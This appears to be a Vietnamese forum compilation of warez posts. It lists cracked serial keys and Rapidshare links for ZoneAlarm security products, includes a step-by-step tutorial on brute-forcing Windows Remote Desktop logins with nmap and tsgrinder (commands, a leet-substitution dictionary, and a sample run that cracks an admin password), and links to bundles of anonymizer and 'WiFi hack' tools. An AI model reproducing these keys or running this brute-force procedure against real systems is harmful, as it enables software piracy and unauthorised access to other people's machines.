http://rapidshare.com/files/7553099/MAIO.part3.rar
|
|
|
ZoneAlarm® INTERNET SECURITY SUITE
The Most Complete Internet Security Solution
Serials:
Code:
fv4th-cjvxu-d8awb-gd9vi2-mix4k0
h0b0a-jbb0t-1dqgb-kpmfkx-4skh00
jjkvd-rk7g1-t4256-5vdj8t-qggsq0
Link : http://rapidshare.com/files/6631061/zaSuiteSetup_65_737_000_en.exe
ZoneAlarm® PRO
Serials:
Code:
8hrne-6w7fh-dvtqt-59epvf-9j5bk0
k8cg5-nc967-iisgt-g90hfh-eebhq0
4wdbk-01m0v-8rq73-53v4xv-5wefq0
Link: http://rapidshare.com/files/6630983/zapSetup_65_737_000_en.exe
ZoneAlarm® ANTIVIRUS
Serials:
Code:
0q1j2-fe45i-2h9nm-a8imd8-dq7000
bhuxd-7xsdj-dem39-p4drgf-w9k640
1uh4h-caa6i-s68h0-0tkcqb-0eh380
Download here:
http://rapidshare.com/files/6631005/zaAvSetup_65_737_000_en.exe
ZoneAlarm® ANTI-SPYWARE
Serials:
Code:
c65mv-5tt2n-15e76-dui24t-xbbuc0
2kfv8-4ged5-pjnbi-ahcfhc-f3m000
2rifa-tk62i-n85ic-hkb9h0-au33q0
Download here:
http://rapidshare.com/files/6630965/zaasSetup_65_737_000_en.exe
ZoneLabs® IMsecure Pro
Serials:
Code:
0npu3-941nu-rqp84-us24wv-snppg0
fqn7b-axmar-ui5jd-7hct3m-x4q8q0
4x253-mq1rg-4m967-st5pt0-hj2m40
Download here:
http://rapidshare.com/files/6630914/imsecureproSetup_15_39.exe
|
|
|
Như anh đã nói ở trên là dict của thằng này ít lắm. Trong file anh gửi có file password.txt thì phải (lấy từ l0phrcrack )) hãy sử dụng tạm cái đó.
Còn hack kiểu này thì chả có gì là phải động não suy nghĩ, nhưng hãy tận dụng những gì mình đang có và đừng e ngại điều gì khi thực hiện (vì có làm thì máy làm chứ không phải mình làm .
Hãy nên sử dụng nó vào mục đích kiểm tra mức độ đặt password của mình có strong hay chưa ? ) .
Ngoài cách này ra thì còn rất nhiều cách khác để xâm nhập, một trong những công cụ để test hệ thống đó là metasploit. Anh đã có viết một bài về metasploit và ứng dụng của nó để khai thác lỗi MS06-040 trên diễn đàn, em có thể tham khảo.
|
|
|
Hôm nay mình sẽ hướng dẫn các bạn cách brute force Remote Desktop. Quá trình thử user và password để cố gắng đăng nhập hệ thống thì không có gì phải suy nghĩa nhiều
đối với một người tấn công, anh ta chỉ việc có một tập hợp từ điển và sử dụng một tool mà tự động đăng nhập và thử lần lượt các password trong world list là xong.
Rất đơn giản thực hiện nhưng lại hiệu quả, bởi vì đa số người quản trị mạng sử dụng các password không phức tạp. Ví dụ đặt password đăng nhập hệ thống của mình là
admin, 123456, 112233, ...v..v. Mọi chuyện đều có thể, nguy cơ bị xâm nhập luôn có thể xảy ra, do vậy không nên loại bỏ bất kỳ khả năng nào. Do đó đặt password login thì cũng nên lưu ý đặt cho strong một chút. Mà strong quá đến lúc mình mình cần nhớ lại để đăng nhập lại quên thì .... (
Remote Desktop là một dịch vụ chạy trên Windows cho phép truy cập từ xa. Dịch vụ này listen trên port 3389. Nếu như bạn thấy không cần thiết cho hệ thống của bạn thì nên disable dịch vụ này cho roài !!!
Demo hệ thống đích có IP: 192.168.1.15
Bước 1:
Đầu tiên ta phải xác định hệ thống đích cần tấn công có dịch vụ Remote Desktop đang chạy hay không?Ở đây mình sử dụng nmap để kiểm tra
Code:
D:\Hacking\nmap>nmap -sT 192.168.1.15 -p 3389
Starting Nmap 4.11 ( http://www.insecure.org/nmap ) at 2006-12-16 11:33 SE Asia
Standard Time
Interesting ports on 192.168.1.15:
PORT STATE SERVICE
3389/tcp open ms-term-serv <-- Dịch vụ này hiện tại đang open
MAC Address: 00:40:CA:25:74:C1 (First Internat'l Computer)
Nmap finished: 1 IP address (1 host up) scanned in 1.172 seconds
....
Bước 2:
Sử dụng công cụ tsgrinder để tiến hành brute force
Code:
D:\Hacking\tsgrinder-2.03>tsgrinder.exe
tsgrinder version 2.03
Usage:
tsgrinder.exe [options] server
Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)
Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1
Những tùy chọn khi sử dụng đã ghi rõ ở trên. Mặc định thì file dict nó có rất ít password để thử, do vậy phải kiếm mấy cái dict trong một số chương trình crack password,
Ở đây mình chỉ lưu ý sử dụng một tính năng hay của tsgrinder là sử dụng tùy chọn -l , mặc định là file leet để chuyển ký tự.
Ví dụ file leet
Code:
Tức là gặp ký tự l nó thay thế bằng 1, e thay thế bằng 3, t thay thế bằng 7, s thay thế bằng 5, các bạn có thể bổ sung sự thay thê này để có được những tổ hợp password phức tạp hơn trong quá trình thử. Password: seamoun, nếu sử dụng tùy chọn -l nó sẽ thử thêm một số pass như 5eamoun, s3amoun, 53amoun
Ví dụ một quá trình thử password
Code:
D:\Hacking\tsgrinder-2.03>tsgrinder.exe -l leet -u admin 192.168.1.15
password apple - failed
password appl3 - failed
password app1e - failed
password app13 - failed
password orange - failed
password orang3 - failed
password pear - failed
password p3ar - failed
password monkey - failed
password monk3y - failed
password s3amoun - success! <-- Khà ! khà ! Dzậy là login với user là admin và password là s3amoun (Hix hix đừng thử pass này với YIM của em :)))
Chúc các bạn thành công ! :!
|
|
|
Bao gồm những phần mềm sau:
Anonymity 4 Proxy
Barefoot IP Monitor
MultiProxy
NetConceal Anonnymizer
Invisible Browsing
IP Switch Pro
Hide IP Platinum
Smart Proxy Helper
Super Proxy Helper
Proxy Switcher Pro
Get Anonymous Pro
CCProxy
SurfAnonymous
Steganos Internet Anonym Pro
Go-Liberty
iPrivacyTools (Proxy Changer)
+ VisualRoute 2006 Server Edition
+ List of free anonymous websites
Link download: http://lix.in/354688
|
|
|
Link: http://rapidshare.com/files/7354527/Surf_The_World_For_Free__WiFi_Radar___WiFi_H_ck_Tools.rar
Pass:iconclast
|
|
|
Nói Rapidshare thì ai cũng ngại vì không có account Premium. Nhưng mình thấy mình cũng không đến nỗi nào khi download chúng vào ban đêm. Tốc độ có thể đạt được trung bình là 50kbs )
|
|
|
Protect folder with a password : ferbl@
Unpack password : fErBl@
http://rapidshare.com/users/9G30QV
Dung lượng hơi nhiều, nếu như bạn nào có Account Premium thì download !!!!
|
|
|
|
|
|
|